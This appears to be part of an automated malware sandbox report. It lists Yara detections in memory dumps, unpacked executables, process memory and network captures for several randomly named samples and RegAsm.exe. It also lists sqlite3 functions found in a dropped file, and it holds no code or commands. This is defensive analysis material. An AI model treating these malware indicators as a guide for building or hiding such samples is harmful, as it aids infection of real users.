Source: Yara match File source: 0000000F.00000002.2138074138.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2027068709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 14.2.2Umx78uafM0WA03fzJyYYhBa.exe.43e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.2Umx78uafM0WA03fzJyYYhBa.exe.43e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2120842089.00000000043E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2717483187.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2589310760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2Umx78uafM0WA03fzJyYYhBa.exe PID: 8072, type: MEMORYSTR
Source: Yara match File source: 00000027.00000002.3002403298.0000000002C91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3002271535.0000000002BEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2614020316.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2308704967.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2753591127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7wpHB_IZvVwIDf0EgO_TfPH6.exe PID: 8048, type: MEMORYSTR
Source: Yara match File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E1307A sqlite3_transfer_bindings, 17_2_61E1307A
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D5E6 sqlite3_bind_int64, 17_2_61E2D5E6
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D595 sqlite3_bind_double, 17_2_61E2D595
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E0B431 sqlite3_clear_bindings, 17_2_61E0B431
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E037F3 sqlite3_value_frombind, 17_2_61E037F3
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D781 sqlite3_bind_zeroblob64, 17_2_61E2D781
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D714 sqlite3_bind_zeroblob, 17_2_61E2D714
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D68C sqlite3_bind_pointer, 17_2_61E2D68C
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D65B sqlite3_bind_null, 17_2_61E2D65B
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D635 sqlite3_bind_int, 17_2_61E2D635
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D9B0 sqlite3_bind_value, 17_2_61E2D9B0
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D981 sqlite3_bind_text16, 17_2_61E2D981
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D945 sqlite3_bind_text64, 17_2_61E2D945
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D916 sqlite3_bind_text, 17_2_61E2D916
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D8E7 sqlite3_bind_blob64, 17_2_61E2D8E7
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E038CA sqlite3_bind_parameter_count, 17_2_61E038CA
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E158CA sqlite3_bind_parameter_index, 17_2_61E158CA
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E038DC sqlite3_bind_parameter_name, 17_2_61E038DC
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E2D8B8 sqlite3_bind_blob, 17_2_61E2D8B8
[Map legend for the contacted-IP distribution by country, binned at <25%, 25-50%, 50-75% and >75% of contacted IPs]